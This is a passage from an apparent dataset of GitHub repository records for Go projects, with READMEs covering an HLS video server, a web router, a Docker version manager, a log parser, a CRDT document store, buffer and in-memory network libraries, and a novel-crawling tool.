URL [http://127.0.0.1:8080](http://127.0.0.1:8080) to access the web interface.\n\n## Contributing\n\n### Requirements\n\n- [go installed](https://golang.org/dl/)\n- [npm installed](https://nodejs.org/en/) *(NPM is part of Node.js)*\n- bash\n\n### Initial setup\n\n1. Clone the repository `git@github.com:shimberger/gohls.git`\n2. 
Build frontend `cd ui/ && npm install && npm run build && cd ..`\n\n### Running server\n\nTo then run the development server execute: `./scripts/run.sh serve`\n\n## License\n\nSee [LICENSE.txt](https://github.com/shimberger/gohls/blob/master/LICENSE.txt)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gravityblast/traffic", "link": "https://github.com/gravityblast/traffic", "tags": [], "stars": 519, "description": "Sinatra inspired regexp/pattern mux and web framework for Go [NOT MAINTAINED]", "lang": "Go", "repo_lang": "", "readme": "# Traffic\n\n[![Build Status](https://travis-ci.org/pilu/traffic.png?branch=master)](https://travis-ci.org/pilu/traffic)\n\nPackage traffic - a Sinatra inspired regexp/pattern mux for [Go](http://golang.org/ \"The Go programming language\").\n\n## Installation\n\n go get github.com/pilu/traffic\n\n## Features\n\n * [Regexp routing](https://github.com/pilu/traffic/blob/master/examples/simple/main.go)\n * [Before Filters](https://github.com/pilu/traffic/blob/master/examples/before-filter/main.go)\n * [Custom not found handler](https://github.com/pilu/traffic/blob/master/examples/not-found/main.go)\n * [Middlewares](https://github.com/pilu/traffic/blob/master/examples/middleware/main.go)\n * Examples: [Airbrake Middleware](https://github.com/pilu/traffic-airbrake), [Chrome Logger Middleware](https://github.com/pilu/traffic-chromelogger)\n * [Templates/Views](https://github.com/pilu/traffic/tree/master/examples/templates)\n * [Easy Configuration](https://github.com/pilu/traffic/tree/master/examples/configuration)\n\n## Development Features\n\n * [Shows errors and stacktrace in browser](https://github.com/pilu/traffic/tree/master/examples/show-errors)\n * [Serves static files](https://github.com/pilu/traffic/tree/master/examples/static-files)\n * Project Generator\n\n`development` is the default environment. 
The above middlewares are loaded only in `development`.\n\nIf you want to run your application in `production`, export `TRAFFIC_ENV` with `production` as value.\n\n```bash\nTRAFFIC_ENV=production your-executable-name\n```\n\n## Installation\n\nDowload the `Traffic` code:\n\n```bash\ngo get github.com/pilu/traffic\n```\n\nBuild the command line tool:\n\n```bash\ngo get github.com/pilu/traffic/traffic\n```\n\nCreate a new project:\n```bash\ntraffic new hello\n```\n\nRun your project:\n```bash\ncd hello\ngo build && ./hello\n```\n\nYou can use [Fresh](https://github.com/pilu/fresh) if you want to build and restart your application every time you create/modify/delete a file.\n\n## Example:\nThe following code is a simple example, the documentation in still in development.\nFor more examples check the `examples` folder.\n\n```go\npackage main\n\nimport (\n \"net/http\"\n \"github.com/pilu/traffic\"\n \"fmt\"\n)\n\nfunc rootHandler(w traffic.ResponseWriter, r *traffic.Request) {\n fmt.Fprint(w, \"Hello World\\n\")\n}\n\nfunc pageHandler(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n fmt.Fprintf(w, \"Category ID: %s\\n\", params.Get(\"category_id\"))\n fmt.Fprintf(w, \"Page ID: %s\\n\", params.Get(\"id\"))\n}\n\nfunc main() {\n router := traffic.New()\n\n // Routes\n router.Get(\"/\", rootHandler)\n router.Get(\"/categories/:category_id/pages/:id\", pageHandler)\n\n router.Run()\n}\n```\n\n## Before Filters\n\nYou can also add \"before filters\" to all your routes or just to some of them:\n\n```go\nrouter := traffic.New()\n\n// Executed before all handlers\nrouter.AddBeforeFilter(checkApiKey).\n AddBeforeFilter(addAppNameHeader).\n AddBeforeFilter(addTimeHeader)\n\n// Routes\nrouter.Get(\"/\", rootHandler)\nrouter.Get(\"/categories/:category_id/pages/:id\", pageHandler)\n\n// \"/private\" has one more before filter that checks for a second api key (private_api_key)\nrouter.Get(\"/private\", privatePageHandler).\n AddBeforeFilter(checkPrivatePageApiKey)\n```\n\nComplete example:\n\n```go\nfunc rootHandler(w traffic.ResponseWriter, r *traffic.Request) {\n fmt.Fprint(w, \"Hello World\\n\")\n}\n\nfunc privatePageHandler(w traffic.ResponseWriter, r *traffic.Request) {\n fmt.Fprint(w, \"Hello Private Page\\n\")\n}\n\nfunc pageHandler(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n fmt.Fprintf(w, \"Category ID: %s\\n\", params.Get(\"category_id\"))\n fmt.Fprintf(w, \"Page ID: %s\\n\", params.Get(\"id\"))\n}\n\nfunc checkApiKey(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n if params.Get(\"api_key\") != \"foo\" {\n w.WriteHeader(http.StatusUnauthorized)\n }\n}\n\nfunc checkPrivatePageApiKey(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n if params.Get(\"private_api_key\") != \"bar\" {\n w.WriteHeader(http.StatusUnauthorized)\n }\n}\n\nfunc addAppNameHeader(w traffic.ResponseWriter, r *traffic.Request) {\n w.Header().Add(\"X-APP-NAME\", \"My App\")\n}\n\nfunc addTimeHeader(w traffic.ResponseWriter, r *traffic.Request) {\n t := fmt.Sprintf(\"%s\", time.Now())\n w.Header().Add(\"X-APP-TIME\", t)\n}\n\nfunc main() {\n router := traffic.New()\n\n // Routes\n router.Get(\"/\", rootHandler)\n router.Get(\"/categories/:category_id/pages/:id\", pageHandler)\n // \"/private\" has one more before filter that checks for a second api key (private_api_key)\n router.Get(\"/private\", privatePageHandler).\n AddBeforeFilter(checkPrivatePageApiKey)\n\n // Executed before all handlers\n 
router.AddBeforeFilter(checkApiKey).\n AddBeforeFilter(addAppNameHeader).\n AddBeforeFilter(addTimeHeader)\n\n router.Run()\n}\n```\n\n## Author\n\n* [Andrea Franz](http://gravityblast.com)\n\n## More\n\n* Code: \n* Mailing List: \n* Chat: \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "howtowhale/dvm", "link": "https://github.com/howtowhale/dvm", "tags": ["docker"], "stars": 519, "description": "Docker Version Manager", "lang": "Go", "repo_lang": "", "readme": "# Docker Version Manager\n\n

[howtowhale.github.io/dvm/](https://howtowhale.github.io/dvm/)
\n\n![dvm-usage](https://cloud.githubusercontent.com/assets/1368985/10800443/d3f0f39a-7d7f-11e5-87b5-1bda5ffe4859.png)\n\nVersion management for your Docker client. Escape from this error for a little bit longer:\n\n```\nError response from daemon: client and server don't have same version (client : 1.18, server: 1.16)\n```\n\n# Contributing\nSee our [Contributing Guide](CONTRIBUTING.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zentures/sequence", "link": "https://github.com/zentures/sequence", "tags": [], "stars": 519, "description": "(Unmaintained) High performance sequential log analyzer and parser", "lang": "Go", "repo_lang": "", "readme": "sequence\n========\n\n**`sequence` is currently iced since I don't have time to continue, and should be considered unstable until further notice. If anyone's interested in continuing development of this, I would be happy to add you to the project.**\n\n[sequencer.io](http://sequencer.io)\n\n[![GoDoc](http://godoc.org/github.com/surge/sequence?status.svg)](http://godoc.org/github.com/surge/sequence) \n\n[![GoDoc](http://godoc.org/github.com/surge/sequence/cmd/sequence?status.svg)](http://godoc.org/github.com/surge/sequence/cmd/sequence)\n\n\n`sequence` is a _high performance sequential log scanner, analyzer and parser_. It _sequentially_ goes through a log message, _parses_ out the meaningful parts, without the use of regular expressions. It can achieve _high performance_ parsing of **100,000 - 200,000 messages per second (MPS)** without the need to separate parsing rules by log source type.\n\n**If you have a set of logs you would like me to test out, please feel free to [open an issue](https://github.com/surge/sequence/issues) and we can arrange a way for me to download and test your logs.**\n\n### Motivation\n\nLog messages are notoriously difficult to parse because they all have different formats. Industries (see Splunk, ArcSight, Tibco LogLogic, Sumo Logic, Logentries, Loggly, LogRhythm, etc etc etc) have been built to solve the problems of parsing, understanding and analyzing log messages.\n\nLet's say you have a bunch of log files you would like to parse. The first problem you will typically run into is that you have no way of telling how many DIFFERENT types of messages there are, so you have no idea how much work there will be to develop rules to parse all the messages. Not only that, you have hundreds of thousands, if not millions of messages, in front of you, and you have no idea which messages are worth parsing, and which are not.\n\nThe typical workflow is to develop a set of regular expressions and keep testing against the logs until some magical moment where all the logs you want parsed are parsed. Ask anyone who does this for a living and they will tell you this process is long, frustrating and error-prone.\n\nEven after you have developed a set of regular expressions that match the original set of messages, if new messages come in, you will have to determine which of the new messages need to be parsed. And if you develop a new set of regular expressions to parse those new messages, you still have no idea if the regular expressions will conflict with the ones you wrote before. If you write your regex parsers too liberally, they can easily parse the wrong messages.\n\nAfter all that, you will end up finding out the regex parsers are quite slow. They can typically parse several thousand messages per second. 
Given enough CPU resources on a large enough machine, regex parsers can probably parse tens of thousands of messages per second. Even to achieve this type of performance, you will likely need to limit the number of regular expressions the parser has. The more regex rules, the slower the parser will go.\n\nTo work around this performance issue, companies have tried to separate the regex rules for different log message types into different parsers. For example, they will have a parser for Cisco ASA logs, a parser for sshd logs, a parser for Apache logs, etc etc. And then they will require the users to tell them which parser to use (usually by indicating the log source type of the originating IP address or host.)\n\nSequence is developed to make analyzing and parsing log messages a lot easier and faster.\n\n### Performance\n\nThe following performance benchmarks are run on a single 4-core (2.8Ghz i7) MacBook Pro, although the tests were only using 1 or 2 cores. The first file is a bunch of sshd logs, averaging 98 bytes per message. The second is a Cisco ASA log file, averaging 180 bytes per message. Last is a mix of ASA, sshd and sudo logs, averaging 136 bytes per message.\n\n```\n $ ./sequence bench scan -i ../../data/sshd.all\n Scanned 212897 messages in 0.78 secs, ~ 272869.35 msgs/sec\n\n $ ./sequence bench parse -p ../../patterns/sshd.txt -i ../../data/sshd.all\n Parsed 212897 messages in 1.69 secs, ~ 126319.27 msgs/sec\n\n $ ./sequence bench parse -p ../../patterns/asa.txt -i ../../data/allasa.log\n Parsed 234815 messages in 2.89 secs, ~ 81323.41 msgs/sec\n\n $ ./sequence bench parse -d ../patterns -i ../data/asasshsudo.log\n Parsed 447745 messages in 4.47 secs, ~ 100159.65 msgs/sec\n```\n\nPerformance can be improved by adding more cores:\n\n\n```\n $ GOMAXPROCS=2 ./sequence bench scan -i ../../data/sshd.all -w 2\n Scanned 212897 messages in 0.43 secs, ~ 496961.52 msgs/sec\n\n GOMAXPROCS=2 ./sequence bench parse -p ../../patterns/sshd.txt -i ../../data/sshd.all -w 2\n Parsed 212897 messages in 1.00 secs, ~ 212711.83 msgs/sec\n\n $ GOMAXPROCS=2 ./sequence bench parse -p ../../patterns/asa.txt -i ../../data/allasa.log -w 2\n Parsed 234815 messages in 1.56 secs, ~ 150769.68 msgs/sec\n\n $ GOMAXPROCS=2 ./sequence bench parse -d ../patterns -i ../data/asasshsudo.log -w 2\n Parsed 447745 messages in 2.52 secs, ~ 177875.94 msgs/sec\n```\n\n### Limitations\n\n* `sequence` does not handle multi-line logs. Each log message must appear as a single line. So if there's multi-line logs, they must first be converted into a single line.\n* `sequence` has only been tested with a limited set of system (Linux, AIX, sudo, ssh, su, dhcp, etc etc), network (ASA, PIX, Neoteris, CheckPoint, Juniper Firewall) and infrastructure application (apache, bluecoat, etc) logs. If you have a set of logs you would like me to test out, please feel free to [open an issue](https://github.com/strace/sequence/issues) and we can arrange a way for me to download and test your logs.\n\n### Usage\n\nTo run the unit tests, you need to be in the top level sequence dir:\n\n```\ngo get github.com/strace/sequence\ncd $GOPATH/src/github.com/strace/sequence\ngo test\n```\n\nTo run the actual command you need to\n\n```\ncd $GOPATH/src/github.com/strace/sequence/cmd/sequence\ngo run sequence.go\n```\n\nDocumentation is available at [sequencer.io](http://sequencer.io).\n\n### License\n\nCopyright (c) 2014 Dataence, LLC. 
All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yorkie-team/yorkie", "link": "https://github.com/yorkie-team/yorkie", "tags": ["yorkie", "collaborative-applications", "crdt", "grpc", "realtime-collaboration", "hacktoberfest", "go"], "stars": 519, "description": "Yorkie is a document store for collaborative applications.", "lang": "Go", "repo_lang": "", "readme": "# Yorkie\n\n[![GitHub](https://img.shields.io/github/stars/yorkie-team/yorkie.svg?style=social)](https://github.com/yorkie-team/yorkie)\n[![Twitter](https://img.shields.io/twitter/follow/team_yorkie.svg?label=Follow)](https://twitter.com/team_yorkie)\n[![Discord](https://img.shields.io/discord/928301813785038878?label=discord&logo=discord&logoColor=white)](https://discord.gg/MVEAwz9sBy)\n[![Contributors](https://img.shields.io/github/contributors/yorkie-team/yorkie.svg)](https://github.com/yorkie-team/yorkie/contributors)\n[![Commits](https://img.shields.io/github/commit-activity/m/yorkie-team/yorkie.svg)](https://github.com/yorkie-team/yorkie/pulse)\n\n[![Build Status](https://github.com/yorkie-team/yorkie/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/yorkie-team/yorkie/actions/workflows/ci.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/yorkie-team/yorkie)](https://goreportcard.com/report/github.com/yorkie-team/yorkie)\n[![CodeCov](https://img.shields.io/codecov/c/github/yorkie-team/yorkie)](https://codecov.io/gh/yorkie-team/yorkie)\n[![Godoc](http://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](https://godoc.org/github.com/yorkie-team/yorkie)\n\nYorkie is an open source document store for building collaborative editing applications. 
Yorkie uses JSON-like documents(CRDT) with optional types.\n\nYorkie consists of three main components: Client, Document and Server.\n\n ```\n Client \"A\" (Go) Server MemDB or MongoDB\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Document \"D-1\" \u2502\u25c4\u2500Changes\u2500\u25ba\u2502 Project \"P-1\" \u2502 \u2502 Changes \u2502\n\u2502 { a: 1, b: {} } \u2502 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\u25c4\u2500\u25ba\u2502 Snapshots \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2502 Document \"D-1\" \u2502 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n Client \"B\" (JS) \u2502 \u2502 { a: 2, b: {} } \u2502 \u2502\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u2502 \u2502 \u2502\n\u2502 Document \"D-1\" \u2502\u25c4\u2500Changes\u2500\u25ba\u2502 \u2502 Document \"D-2\" \u2502 \u2502\n\u2502 { a: 2, b: {} } \u2502 \u2502 \u2502 { a: 3, b: {} } \u2502 \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n Admin (CLI, Web) \u2502 \u2502\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\u2502 Query \"Q-1\" \u2502 \u25b2\n\u2502 P-1.find({a:2}) \u251c\u2500\u2500\u2500\u2500\u2500 Query\u2500\u2500\u2500\u2518\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n ```\n\n- Clients can have a replica of the document representing an application model locally on several devices.\n- Each client can independently update the document on their local device, even while offline.\n- When a network connection is available, the client figures out which changes need to be synced from one device to another, and brings them into the same state.\n- If the document was changed concurrently on different devices, Yorkie automatically syncs the changes, so that every replica ends up in the same state with resolving conflict.\n\n## SDKs\n\nYorkie provides SDKs for Go, JavaScript, iOS, and Android:\n\n- [Go SDK](https://github.com/yorkie-team/yorkie)\n - Client: https://github.com/yorkie-team/yorkie/tree/main/client\n - Document: https://github.com/yorkie-team/yorkie/tree/main/pkg/document\n- [JS SDK](https://github.com/yorkie-team/yorkie-js-sdk)\n- [iOS SDK](https://github.com/yorkie-team/yorkie-ios-sdk)\n- [Android SDK](https://github.com/yorkie-team/yorkie-android-sdk)\n- [Dashboard](https://github.com/yorkie-team/dashboard)\n\n## Documentation\n\nFull, comprehensive [documentation](https://yorkie.dev/docs) is available on the 
Yorkie website.\n\n### Getting Started\n\n- [with JS SDK](https://yorkie.dev/docs/getting-started/with-js-sdk)\n- [with iOS SDK](https://yorkie.dev/docs/getting-started/with-ios-sdk)\n- [with Android SDK](https://yorkie.dev/docs/getting-started/with-android-sdk)\n\n## Contributing\n\nSee [CONTRIBUTING](CONTRIBUTING.md) for details on submitting patches and the contribution workflow.\n\n## Contributors \u2728\n\nThanks go to these incredible people:\n\n\n \"contributors\"/\n\n\n## Sponsors\n\nIs your company using Yorkie? Ask your boss to support us. It will help us dedicate more time to maintain this project and to make it even better for all our users. Also, your company logo will show up on here and on our website: -) [[Become a sponsor](https://opencollective.com/yorkie#sponsor)]\n\n\n### Backers\n\nPlease be our [Backers](https://opencollective.com/yorkie#backers).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "djherbis/buffer", "link": "https://github.com/djherbis/buffer", "tags": [], "stars": 518, "description": "Composable Buffers for Go #golang", "lang": "Go", "repo_lang": "", "readme": "Buffer \n==========\n\n[![GoDoc](https://godoc.org/github.com/djherbis/buffer?status.svg)](https://godoc.org/github.com/djherbis/buffer)\n[![Release](https://img.shields.io/github/release/djherbis/buffer.svg)](https://github.com/djherbis/buffer/releases/latest)\n[![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg)](LICENSE.txt)\n[![go test](https://github.com/djherbis/buffer/actions/workflows/go-test.yml/badge.svg)](https://github.com/djherbis/buffer/actions/workflows/go-test.yml)\n[![Coverage Status](https://coveralls.io/repos/djherbis/buffer/badge.svg?branch=master)](https://coveralls.io/r/djherbis/buffer?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/djherbis/buffer)](https://goreportcard.com/report/github.com/djherbis/buffer)\n\nUsage\n------------\n\nThe following buffers provide simple unique behaviours which when composed can create complex buffering strategies. For use with github.com/djherbis/nio for Buffered io.Pipe and io.Copy implementations.\n\nFor example: \n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n \"github.com/djherbis/nio\"\n \n \"io/ioutil\"\n)\n\n// Buffer 32KB to Memory, after that buffer to 100MB chunked files\nbuf := buffer.NewUnboundedBuffer(32*1024, 100*1024*1024)\nnio.Copy(w, r, buf) // Reads from r, writes to buf, reads from buf writes to w (concurrently).\n\n// Buffer 32KB to Memory, discard overflow\nbuf = buffer.NewSpill(32*1024, ioutil.Discard)\nnio.Copy(w, r, buf)\n```\n\nSupported Buffers\n------------\n\n#### Bounded Buffers ####\n\nMemory: Wrapper for bytes.Buffer\n\nFile: File-based buffering. The file never exceeds Cap() in length, no matter how many times its written/read from. It accomplishes this by \"wrapping\" around the fixed max-length file when the data gets too long but there is available freed space at the beginning of the file. 
The caller is responsible for closing and deleting the file when done.\n\n```go\nimport (\n \"ioutil\"\n \"os\"\n \n \"github.com/djherbis/buffer\"\n)\n\n// Create a File-based Buffer with max size 100MB\nfile, err := ioutil.TempFile(\"\", \"buffer\")\nif err != nil {\n\treturn err\n}\ndefer os.Remove(file.Name())\ndefer file.Close()\n\nbuf := buffer.NewFile(100*1024*1024, file)\n\n// A simpler way:\npool := buffer.NewFilePool(100*1024*1024, \"\") // \"\" -- use temp dir\nbuf, err := pool.Get() // allocate the buffer\nif err != nil {\n return err\n}\ndefer pool.Put(buf) // close and remove the allocated file for the buffer\n\n```\n\nMulti: A fixed length linked-list of buffers. Each buffer reads from the next buffer so that all the buffered data is shifted upwards in the list when reading. Writes are always written to the first buffer in the list whose Len() < Cap().\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\nmem := buffer.New(32*1024)\nfile := buffer.NewFile(100*1024*1024, someFileObj)) // you'll need to manage Open(), Close() and Delete someFileObj\n\n// Buffer composed of 32KB of memory, and 100MB of file.\nbuf := buffer.NewMulti(mem, file)\n```\n\n#### Unbounded Buffers ####\n\nPartition: A queue of buffers. Writes always go to the last buffer in the queue. If all buffers are full, a new buffer is \"pushed\" to the end of the queue (generated by a user-given function). Reads come from the first buffer, when the first buffer is emptied it is \"popped\" off the queue.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\n// Create 32 KB sized-chunks of memory as needed to expand/contract the buffer size.\nbuf := buffer.NewPartition(buffer.NewMemPool(32*1024))\n\n// Create 100 MB sized-chunks of files as needed to expand/contract the buffer size.\nbuf = buffer.NewPartition(buffer.NewFilePool(100*1024*1024, \"\"))\n```\n\nRing: A single buffer which begins overwriting the oldest buffered data when it reaches its capacity.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\n// Create a File-based Buffer with max size 100MB\nfile := buffer.NewFile(100*1024*1024, someFileObj) // you'll need to Open(), Close() and Delete someFileObj.\n\n// If buffered data exceeds 100MB, overwrite oldest data as new data comes in\nbuf := buffer.NewRing(file) // requires BufferAt interface.\n```\n\nSpill: A single buffer which when full, writes the overflow to a given io.Writer.\n-> Note that it will actually \"spill\" whenever there is an error while writing, this should only be a \"full\" error.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n \"github.com/djherbis/nio\"\n \n \"io/ioutil\"\n)\n\n// Buffer 32KB to Memory, discard overflow\nbuf := buffer.NewSpill(32*1024, ioutil.Discard)\nnio.Copy(w, r, buf)\n```\n\n#### Empty Buffer ####\n\nDiscard: Reads always return EOF, writes goto ioutil.Discard.\n\n```go\nimport (\n \"github.com/djherbis/buffer\"\n)\n\n// Reads will return io.EOF, writes will return success (nil error, full write) but no data was written.\nbuf := buffer.Discard\n```\n\nCustom Buffers\n------------\n\nFeel free to implement your own buffer, just meet the required interface (Buffer/BufferAt) and compose away!\n\n```go\n\n// Buffer Interface used by Multi and Partition\ntype Buffer interface {\n\tLen() int64\n\tCap() int64\n\tio.Reader\n\tio.Writer\n\tReset()\n}\n\n// BufferAt interface used by Ring\ntype BufferAt interface {\n\tBuffer\n\tio.ReaderAt\n\tio.WriterAt\n}\n\n```\n\nInstallation\n------------\n```sh\ngo get github.com/djherbis/buffer\n```\n", 
"readme_type": "markdown", "hn_comments": "Hey author here, happy to answer your questions.Nice work. buffer.NewPool is a great convenience over writing your own sync.Pool.I was previously using https://github.com/oxtoacart/bpool as a 64K buffer pool for rendering (concurrently) template/html contents\u2014so I can check for the errors from template.Render\u2014before then using io.Copy to copy the \"known good\" contents to the http.ResponseWriter. I may have to look into using this.As a relative go newb, I do have a question about this: I thought channels/go routines were already essentially composable buffers. No? // Buffer 32KB to Memory, after that buffer to 100MB chunked files\n buf := buffer.NewUnboundedBuffer(32*1024, 100*1024*1024)\n\n pool := NewFilePool(100*1024*1024, \"\") // \"\" -- use temp dir\n\nI seem to have a twofold feeling about this code: on one hand I really like the brevity of these statements, but on the other hand it does come at the cost of being rather cryptic: without the comments one can only guess what exactly is going on. To the point that should I want to use this in my own code and make it understandable I'd almost would be forced to either copy the comments as well or else wrap it in a method with another name or. In such cases it probably would have been better if the original API already had done this.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "akutz/memconn", "link": "https://github.com/akutz/memconn", "tags": [], "stars": 518, "description": "MemConn is an in-memory network stack for Go.", "lang": "Go", "repo_lang": "", "readme": "# MemConn [![GoDoc](https://godoc.org/github.com/akutz/memconn?status.svg)](http://godoc.org/github.com/akutz/memconn) [![Build Status](http://travis-ci.org/akutz/memconn.svg?branch=master)](https://travis-ci.org/akutz/memconn) [![Go Report Card](http://goreportcard.com/badge/akutz/memconn)](http://goreportcard.com/report/akutz/memconn)\nMemConn provides named, in-memory network connections for Go.\n\n## Create a Server\nA new `net.Listener` used to serve HTTP, gRPC, etc. is created with\n`memconn.Listen`:\n\n```go\nlis, err := memconn.Listen(\"memu\", \"UniqueName\")\n```\n\n## Creating a Client (Dial)\nClients can dial any named connection:\n\n```go\nclient, err := memconn.Dial(\"memu\", \"UniqueName\")\n```\n\n## Network Types\nMemCon supports the following network types:\n\n| Network | Description |\n|---------|-------------|\n| `memb` | A buffered, in-memory implementation of `net.Conn` |\n| `memu` | An unbuffered, in-memory implementation of `net.Conn` |\n\n## Performance\nThe benchmark results illustrate MemConn's performance versus TCP\nand UNIX domain sockets:\n\n![ops](https://imgur.com/o8mXla6.png \"Ops (Larger is Better)\")\n![ns/op](https://imgur.com/8YvPmMU.png \"Nanoseconds/Op (Smaller is Better)\")\n![B/op](https://imgur.com/vQSfIR2.png \"Bytes/Op (Smaller is Better)\")\n![allocs/op](https://imgur.com/k263257.png \"Allocs/Op (Smaller is Better)\")\n\nMemConn is more performant than TCP and UNIX domain sockets with respect\nto the CPU. 
While MemConn does allocate more memory, this is to be expected\nsince MemConn is an in-memory implementation of the `net.Conn` interface.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ma6254/FictionDown", "link": "https://github.com/ma6254/FictionDown", "tags": ["biquge", "qidian", "fiction", "novels", "spider", "crawler", "golang"], "stars": 517, "description": "\u5c0f\u8bf4\u4e0b\u8f7d|\u5c0f\u8bf4\u722c\u53d6|\u8d77\u70b9|\u7b14\u8da3\u9601|\u5bfc\u51faMarkdown|\u5bfc\u51fatxt|\u8f6c\u6362epub|\u5e7f\u544a\u8fc7\u6ee4|\u81ea\u52a8\u6821\u5bf9", "lang": "Go", "repo_lang": "", "readme": "# FictionDown\n\nFictionDown \u662f\u4e00\u4e2a\u547d\u4ee4\u884c\u754c\u9762\u7684\u5c0f\u8bf4\u722c\u53d6\u5de5\u5177\n\n**\u7528\u4e8e\u6279\u91cf\u4e0b\u8f7d\u76d7\u7248\u7f51\u7edc\u5c0f\u8bf4\uff0c\u8be5\u8f6f\u4ef6\u4ec5\u7528\u4e8e\u6570\u636e\u5206\u6790\u7684\u6837\u672c\u91c7\u96c6\uff0c\u8bf7\u52ff\u7528\u4e8e\u5176\u4ed6\u7528\u9014**\n\n**\u8be5\u8f6f\u4ef6\u6240\u4ea7\u751f\u7684\u6587\u6863\u8bf7\u52ff\u4f20\u64ad\uff0c\u8bf7\u52ff\u7528\u4e8e\u6570\u636e\u8bc4\u4f30\u5916\u7684\u5176\u4ed6\u7528\u9014**\n\n[![License](https://img.shields.io/github/license/ma6254/FictionDown.svg)](https://raw.githubusercontent.com/ma6254/FictionDown/master/LICENSE)\n[![release_version](https://img.shields.io/github/release/ma6254/FictionDown.svg)](https://github.com/ma6254/FictionDown/releases)\n[![last-commit](https://img.shields.io/github/last-commit/ma6254/FictionDown.svg)](https://github.com/ma6254/FictionDown/commits)\n[![Download Count](https://img.shields.io/github/downloads/ma6254/FictionDown/total.svg)](https://github.com/ma6254/FictionDown/releases)\n[![goproxy.cn](https://goproxy.cn/stats/github.com/ma6254/FictionDown/badges/download-count.svg)](https://goproxy.cn)\n\n[![godoc](https://img.shields.io/badge/godoc-reference-blue.svg)](https://pkg.go.dev/github.com/ma6254/FictionDown/)\n[![QQ \u7fa4](https://img.shields.io/badge/qq%E7%BE%A4-934873832-orange.svg)](https://jq.qq.com/?_wv=1027&k=5bN0SVA)\n\n[![Go](https://github.com/ma6254/FictionDown/workflows/Go/badge.svg)](https://github.com/ma6254/FictionDown/actions/runs/39839114)\n[![travis-ci](https://www.travis-ci.org/ma6254/FictionDown.svg?branch=master)](https://travis-ci.org/ma6254/FictionDown)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ma6254/FictionDown)](https://goreportcard.com/report/github.com/ma6254/FictionDown)\n\n## \u6587\u6863\n\n\u6587\u6863\u76ee\u524d\u300c\u6307\u5357\u300d\u90e8\u5206\u5df2\u5b8c\u6210\uff0c\u4f60\u53ef\u4ee5\u5728[\u8fd9\u91cc](https://ma6254.github.io/FictionDown/)\u67e5\u770b\u3002\n\n## \u7279\u6027\n\n- \u4ee5\u8d77\u70b9\u4e3a\u6837\u672c\uff0c\u591a\u7ad9\u70b9\u591a\u7ebf\u7a0b\u722c\u53d6\u6821\u5bf9\n- \u652f\u6301\u5bfc\u51fa 